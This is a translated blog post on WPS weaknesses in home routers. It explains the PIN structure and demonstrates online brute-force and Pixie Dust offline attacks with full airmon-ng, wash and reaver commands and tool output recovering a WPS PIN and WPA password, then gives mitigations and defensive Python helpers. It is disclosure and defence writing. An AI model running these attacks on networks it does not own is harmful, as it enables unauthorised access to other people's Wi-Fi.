My worry

TL;DR Disable WPS on your router or access point today! Otherwise, an attacker could gain a foothold into your network and plan for further attacks.

In my own research, I was surprised to find that my home router was vulnerable to a WPS offline brute force attack. What that meant was that an attacker within a reasonable distance (up to approximately 50 m if a strong wireless-capable device was in use) was able to extract my WiFi’s WPA2/PSK, more than 12 characters in length (with reasonable complexity), in mere seconds!

I have disclosed the vulnerability to my Telco service provider, who is working with the vendor to issue a patch for all users using the issued device.

What is WPS?

In 2006, the Wi-Fi Alliance introduced WPS, which was originally known as Wi-Fi Simple Config. WPS is a wireless network security standard that makes establishing connections between a router and wireless devices faster and easier. Instead of the traditional way of selecting the network name (also called the SSID) and keying in the password (also called the WPA-PSK key), WPS can be triggered with just a few button presses on the physical device. It works well for electronic devices (e.g. printers, TVs, smart home products etc.) with no or limited user interface.

WPS in application

Even if you have not used WPS before, I am sure most of you would have come across it without knowing what it was for at the time. For the sake of explanation, let’s assume there are two wireless devices, a.k.a. clients (a printer and an Android phone), that wish to join the network using WPS. The first step is to trigger the WPS feature on the wireless device.

Figure 2: Select WPS connection via the Wi-Fi setting on an Android phone

Secondly, the user has to go to the router or Access Point (AP) to trigger the WPS feature. Once the button is pressed, this technology will perform its magic.

Figure 3: Press the WPS connection button on the router/AP

The devices should then be connected a few seconds later. If the wireless device has some form of user interface, you should be able to take note of the successful connection to the network.

Figure 4: Indication of successful connection on the Android phone

In the printer’s case, a successful connection will likely be indicated by a flashing LED or some other form of indicator.

What we have discussed is the Push Button Configuration (PBC) method. An alternative is to provide an 8-digit PIN, which is known as the Personal Identification Number (PIN) method. In addition, these modes can be triggered by either the client or the AP.

How is WPS bad?

As mentioned earlier, WPS was created with convenience in mind, which means that there is a huge trade-off between security and convenience. In a nutshell, an attacker who manages to obtain the WPS PIN of an AP can authenticate to your network and even extract your seemingly complex WiFi password.

There are three types of attacks against WPS-enabled APs. The first is an online brute force attack, while the second is an offline attack on the WPS PIN. An attacker can perform these two attacks from up to approximately 50 meters away, depending on the capability of their wireless network device. The last attack requires the attacker to be physically next to the AP. For example, the attacker could press the WPS button on the AP (as shared in the previous section), and at times the WPS PIN is printed on the AP itself. Assuming there is a malicious insider, this could be an easy entry to the corporate network. Even though these attacks have been shared over the internet for the past decade, WPS-enabled devices are still everywhere (enabled by default)!

Before we dive into the specifics of the first two attacks, let’s look at how the WPS PIN is structured.

WPS Pin Structure

Every WPS PIN consists of an 8-digit number. The last digit of the PIN is a checksum. However, the 8-digit PIN is not validated against the AP as a whole. The process requires the client to first prove possession of the first four digits. If the first four digits are accurate, the AP will then require the client to furnish the remaining four digits.

From an attacker’s perspective, this basically means that a brute force attempt is actually feasible, with a total of 11000 possibilities (10⁴ for the first four digits plus 10³ for the three digits in the second half, since the last digit is a checksum that can be calculated).

Figure 5: WPS pin structure breakdown
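
The PIN structure above as an added worked example (not code from the original post): it computes the checksum digit, checks the PINs that appear in the tool output on this page, and compares the guess count an AP must withstand when the halves are confirmed separately versus as a whole. The 33 seconds per attempt is the figure reported later in this post; the lockout policy parameters are hypothetical.

```python
def wps_checksum(first7: int) -> int:
    """Checksum digit for the first seven PIN digits.

    Digits are weighted 3, 1, 3, 1, ... starting from the rightmost one.
    """
    accum, weight = 0, 3
    while first7:
        accum += weight * (first7 % 10)
        first7 //= 10
        weight = 4 - weight  # alternate between 3 and 1
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True if `pin` is eight ASCII digits and its last digit is the checksum."""
    if len(pin) != 8 or not (pin.isascii() and pin.isdigit()):
        return False
    return wps_checksum(int(pin[:7])) == int(pin[7])


def keyspace(split_halves: bool) -> int:
    """Worst-case number of guesses the AP has to withstand."""
    if split_halves:
        return 10**4 + 10**3  # halves confirmed separately: 10,000 + 1,000
    return 10**7              # whole PIN confirmed at once: 7 free digits


def worst_case_days(guesses, seconds_per_guess, lock_after=0, lock_seconds=0):
    """Days needed to exhaust `guesses`.

    Hypothetical lockout policy: the AP disables WPS for `lock_seconds`
    after every `lock_after` failed attempts (0 means no lockout).
    """
    total = guesses * seconds_per_guess
    if lock_after:
        total += ((guesses - 1) // lock_after) * lock_seconds
    return total / 86400


if __name__ == "__main__":
    for pin in ("11115670", "63968767", "12345670"):  # PINs from this page's output
        print(pin, "checksum ok" if is_valid_pin(pin) else "bad checksum")
    print("whole-PIN check :", keyspace(False), "guesses")
    print("split-half check:", keyspace(True), "guesses")
    print("no lockout      : %.1f days" % worst_case_days(11000, 33))
    print("3 tries / 1 hour: %.1f days" % worst_case_days(11000, 33, 3, 3600))
```

The last two lines show why an AP-side lockout matters: the same 11000 guesses take a few days without one and several months with it.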

Online brute force attack

Before going into the nitty-gritty details, note that a proper WPS transaction consists of a series of exchanges between a client and an AP.

*For simplicity, I have termed them client and AP rather than using the industry terms (registrar and enrollee).

In summary, this series of exchanges is also known as a “cryptodance”. Each side proves to the other that it knows the PIN without giving it away first.

To conduct this online brute force attack, we can use the reaver tool. Do note that a lot of blogs out there are using reaver’s older version, and the flags/parameters used may not apply in the latest version of reaver. I’ve spent many hours trying to figure out the appropriate flags and also how to interpret whether the tool is working well based on the verbose output messages. I will be sharing them in detail. For my demonstration, I am using a Kali Linux VM along with a Wi-Fi USB adapter (Alfa).

Place the wireless adapter into monitor mode:

root@kali:~# airmon-ng start wlan0

Identify nearby devices that have WPS:

root@kali:~# wash -i wlan0mon

BSSID               Ch  dBm  WPS  Lck  Vendor    ESSID
--------------------------------------------------------------------------------
58:6D:8F:09:95:77   11  -30  2.0  No   Broadcom  TestAP

*A simple search around my home vicinity revealed more than 30 APs allowing WPS.

Start performing the online brute force against the BSSID you are targeting:

root@kali:~# reaver -i wlan0mon -b 58:6D:8F:09:95:77 -vv -d 3 -N -L -c 11

Reaver v1.6.6 WiFi Protected Setup Attack Tool
Copyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from 58:6D:8F:09:95:77
[+] Switching wlan0mon to channel 11
[+] Received beacon from 58:6D:8F:09:95:77
[+] Vendor: Broadcom
[+] Trying pin "11115670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 58:6D:8F:09:95:77 (ESSID: TestAP)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK

// If the client is unable to furnish the first four digits of the PIN, the AP will not send the M5 message. The brute force continues with a different PIN.

[+] 15.62% complete @ 2020-06-25 03:16:33 (33 seconds/pin)
[+] Trying pin "63968767"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 58:6D:8F:09:95:77 (ESSID: TestAP)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
<truncated for brevity>
[+] Received M1 message
[+] Sending M2 message
<truncated for brevity>
[+] Received M3 message
[+] Sending M4 message
<truncated for brevity>
[+] Received M5 message
[+] Sending M6 message
<truncated for brevity>
[+] Received M7 message
[+] Sending WSC NACK
[+] Pin cracked in 51 seconds
[+] WPS PIN: '63968767'
[+] WPA PSK: 'testing1'
[+] AP SSID: 'TestAP'

*Note: Do not be alarmed if you observe a lot of repeated packets coming from the AP. I have snipped them out for brevity.

reaver -i wlan0mon -b 58:6D:8F:09:95:77 -vv -d 3 -N -L -c 11

- -vv -> Display non-critical warnings (-vv or -vvv for more)
- -d -> Set the delay between pin attempts. There may be a need to modify this value or the timeout (-t) to circumvent possible rate-limiting on the device
- -N -> Do not send NACK messages when out of order packets are received. I noticed that if this option is not set, I am unable to perform any successful brute force
- -L -> Ignore locked state reported by the target AP
- -c -> Set the 802.11 channel for the interface (implies -f)

Based on the output of the tool, it takes approximately 33 seconds to test a PIN. Thus, with 11000 possibilities, it may take up to 4 days to gain access to the network. Still, that is a pretty feasible wait to gain a foothold in the network. I usually start the brute force from 6000 onward (by modifying the code in keys.c) and then subsequently downwards from 6000. It may be just me, but I tend to notice that the majority (80%) of WPS PINs start in a higher number range (6000 0000–9999 9999). With sufficient time, an online brute force attack will work and eventually reveal the PSK to an attacker.

Offline brute force attack

A Swiss researcher by the name of Dominique Bongard found a flaw in many APs’ implementation of the M3 message highlighted in Figure 6. In it, the AP encrypts the actual PIN using a strong algorithm (AES) with secret keys consisting of two randomly-chosen numbers, and sends you the result. As mentioned, the process is a ‘cryptodance’: the AP has committed to its proof that it knows the PIN, but in a way that you can’t verify until later.

To reference a good analogy shared in the Sophos blog: “It’s a bit like a sealed-bid auction, where the router’s bid is locked in before yours, but in a way that you can’t see it in order to determine your bid. But what the Swiss researcher found is that many routers didn’t seal their bids very well, using “random” numbers that you could guess, or in some cases calculate for yourself. In other words, at step M3, you could simply fail the protocol, and go ahead cracking the encryption on the M3 data packet. That would reveal the PIN directly, no guessing required.”

All in all, it is possible to brute force the WPS PIN by capturing an attempted (even failed) exchange. This allows an attacker to obtain the WPS PIN in mere seconds, and eventually obtain the Wi-Fi PSK key, gaining access to the Wi-Fi network.

However, this attack goes back to the early 2010s and most of the vendors have already patched this issue. Just recently, when I embarked on this research journey, I recall telling my colleagues that WPS offline cracking attacks had long been fixed and, from reading forums, that security testers had never seen an AP vulnerable to this issue before.

Ironically, when I returned home to test on my home networks, I was surprised that the tool ‘pixiedust’ returned my WPA2-PSK in mere seconds. What’s more, I had used a password longer than 12 characters and with reasonable complexity. The nightmare was that the AP does not allow me to disable WPS. I immediately searched the internet for an updated firmware but there wasn’t any.

*To date, I have informed the Telco of the vulnerability and they are working with the vendor to issue a patch in the coming months.

Most of the WPS attack tools have been integrated into the Reaver tool. This test is pretty quick: if it works, it works; if it doesn’t, that just means your product is not vulnerable to offline brute force attacks. To conduct this attack, simply run the following command:

root@kali:/tmp# reaver -i wlan0mon -b <bssid> -vv -L -N -c 1 -K

// -K will trigger the pixiedust attack. All it requires is a single failed attempt in order to crack the PIN.

Reaver v1.6.6 WiFi Protected Setup Attack Tool
Copyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching wlan0mon to channel 1
[+] Waiting for beacon from <BSSID>
[+] Received beacon from <BSSID>
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with <BSSID> (ESSID: <redacted>)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
executing pixiewps -e <redacted> -s <redacted> -z <redacted> -a <redacted> -n <redacted> -r <redacted>

Pixiewps 1.4

[?] Mode: 3 (RTL819x)
[*] Seed N1: <redacted>
[*] Seed ES1: <redacted>
[*] Seed ES2: <redacted>
[*] PSK1: <redacted 16 byte hex>
[*] PSK2: <redacted 16 byte hex>
[*] ES1: <redacted 16 byte hex>
[*] ES2: <redacted 16 byte hex>
[+] WPS pin: <redacted>
[*] Time taken: 0 s 70 ms

[+] Pixiewps: success: setting pin to <redacted>
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Updated P1 array
[+] Updated P2 array
[+] Quitting after pixiewps attack
[+] Pin cracked in 15 seconds
[+] WPS PIN: <redacted>
[+] WPA PSK: <redacted>
[+] AP SSID: <redacted>

As seen from the output, the PIN was cracked in 15 seconds. This is way faster than the online brute forcing technique, which could take up to approximately four days.

What should you do to prevent yourself from being a target?

Personally, I feel that Wi-Fi settings, configurations and security have often been overlooked. We have seen the good and the bad of WPS, and yet it is enabled by default in most APs today. I would like to share a couple of recommendations to prevent WPS attacks:

- Disable WPS if it is not in use … Disable WPS if it is not in use … Disable WPS if it is not in use! I can’t stress this enough. You can do so by heading to your AP web interface (if you have not changed your web portal login credentials, this will be a good time to do so!) and locating the WPS feature. By disabling it, you are cutting off all connections via WPS. This applies to both the push button mode and the PIN mode (as demonstrated in the attacks). If you really need to use WPS to pair devices with no or limited user interface, just remember to turn this feature on for the pairing and off again once the pairing succeeds.

- Evaluate your home routers by performing simple tests on them. There are instances where, even when you turn off WPS, the AP could still be mysteriously accepting WPS in the background. You can watch for such behaviour by listening on the air (wash -i wlan0mon). If you are a frequent user of WPS, you may want to ensure that the AP is not vulnerable to the offline brute force attack.

- Remove any printed WPS PIN from your physical device. With the disclosed PIN, an attacker could specify it by using the -p flag in Reaver. A malicious insider will then be able to gain access to your network PSK within a single try via the online brute force attack.
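
One way to automate the second recommendation, as an added example that is not part of the original post: it parses saved `wash` output and reports which of your own APs still advertise WPS after you believe it is disabled. It assumes the column layout shown in the wash output earlier on this page; the sample rows other than the first and the BSSIDs passed to `audit` are constructed.

```python
import re

# One data row of `wash` output: BSSID, channel, dBm, WPS version, lock state, vendor, ESSID.
ROW = re.compile(
    r"^(?P<bssid>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})\s+(?P<ch>\d+)\s+(?P<dbm>-?\d+)\s+"
    r"(?P<wps>\d+\.\d+)\s+(?P<lck>Yes|No)\s+(?P<vendor>\S+)\s+(?P<essid>.*\S)\s*$"
)

# Constructed sample: the first row is the one shown in this post, the other two are made up.
SAMPLE = """\
BSSID               Ch  dBm  WPS  Lck  Vendor    ESSID
--------------------------------------------------------------------------------
58:6D:8F:09:95:77   11  -30  2.0  No   Broadcom  TestAP
02:00:00:AA:BB:01    6  -55  2.0  Yes  RalinkTe  GuestAP
02:00:00:AA:BB:02    1  -71  1.0  No   AtherosC  Neighbour Net
"""


def parse_wash(text):
    """Return one dict per AP row; header and separator lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m is None:
            continue
        row = m.groupdict()
        row["bssid"] = row["bssid"].upper()
        row["locked"] = row.pop("lck") == "Yes"
        rows.append(row)
    return rows


def audit(text, my_bssids):
    """Split your own APs into those still advertising WPS and those not seen."""
    mine = {b.upper() for b in my_bssids}
    advertising = []
    for ap in parse_wash(text):
        if ap["bssid"] in mine:  # other people's APs are out of scope
            state = "locked" if ap["locked"] else "unlocked"
            advertising.append((ap["bssid"], ap["essid"], ap["wps"], state))
    seen = {entry[0] for entry in advertising}
    return {"advertising": advertising, "not_seen": sorted(mine - seen)}


if __name__ == "__main__":
    # Hypothetical inventory of APs you own.
    report = audit(SAMPLE, ["58:6d:8f:09:95:77", "02:00:00:AA:BB:01", "02:00:00:AA:BB:09"])
    for bssid, essid, wps, state in report["advertising"]:
        print(f"FINDING {bssid} ({essid}): WPS {wps} still advertised, {state}")
    for bssid in report["not_seen"]:
        print(f"OK?     {bssid}: no WPS beacon seen (confirm the AP was in range)")
```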

Translated from: https://medium.com/swlh/my-worst-nightmare-on-discovering-a-wi-fi-wps-vulnerability-on-my-home-router-45330c5444bc
